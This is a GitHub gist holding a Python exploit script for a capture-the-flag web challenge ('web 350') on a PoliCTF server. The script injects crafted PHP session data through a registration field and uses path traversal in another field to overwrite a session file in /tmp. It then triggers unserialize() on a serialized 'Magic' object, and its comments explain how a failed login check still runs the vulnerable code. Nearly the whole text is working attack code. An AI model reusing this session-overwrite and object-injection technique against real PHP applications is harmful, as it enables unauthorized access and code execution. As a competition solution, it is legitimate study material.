-
-
Save cebrusfs/582492a4036dc41b2a76 to your computer and use it in GitHub Desktop.
web 350
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import random | |
import string | |
URL = 'http://magic.polictf.it/' | |
name = ''.join(random.sample(string.ascii_letters, 10)) | |
sessid = 'trbfs2mbi41lmeg32439vu1gb4' | |
''' | |
# 1. binding the user and session which make isLogged() checking in 'magic_things.php' passed. | |
# It does not needed. | |
# Because even if isLogined() check fail, | |
# it will still execute the rest of code which is include 'unserialize()'. | |
r = requests.post( | |
URL + 'index.php', | |
params = {'page': 'register'}, | |
data = { | |
'name': name, | |
'surname': name, | |
'username': name, | |
'password': name, | |
'register': 'send' | |
} | |
) | |
print 'register', 'ok, now u can log in' in r.text | |
r = requests.post( | |
URL + 'index.php', | |
data = { | |
'username': name, | |
'password': name, | |
'login': 'login' | |
}, | |
cookies = { | |
'PHPSESSID': sessid | |
} | |
) | |
print 'login', 'magic_things.php' in r.text | |
print r.text | |
print 'stage1 done' | |
raw_input() | |
''' | |
# 2. register a new user and let it login, and it will active and overwrite the log (our session file) | |
# (in active, fopen is "w+") | |
name2 = name + '_write' | |
r = requests.post( | |
URL + 'index.php', | |
data = { | |
# inject session content | |
# `s:0:""` is for fixing the user field | |
# and inject { user: name, userObject: serialize(new Magic) } | |
'name': 's:0:"";user|s:%d:"%s";userObject|s:16:"O:5:"Magic":0:{}";' % (len(name), name), | |
'surname': '/../../tmp/sess_' + sessid, | |
'username': name2, | |
'password': name2, | |
'register': 'send' | |
} | |
) | |
print 'register', 'ok, now u can log in' in r.text | |
# login and write session !!!!!! | |
r = requests.post( | |
URL + 'index.php', | |
data = { | |
'username': name2, | |
'password': name2, | |
'login': 'login' | |
} | |
) | |
print 'login', 'magic_things.php' in r.text | |
print 'stage2 done' | |
# 3. triger unserialize | |
r = requests.get( | |
URL + 'magic_things.php', | |
params = {'logout': 'true'}, | |
cookies = { | |
'PHPSESSID': sessid | |
}, | |
# because isLogined() check fail will redirect | |
# but it will still execute unserialize and output result | |
# we need that result | |
allow_redirects=False | |
) | |
print r.text |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment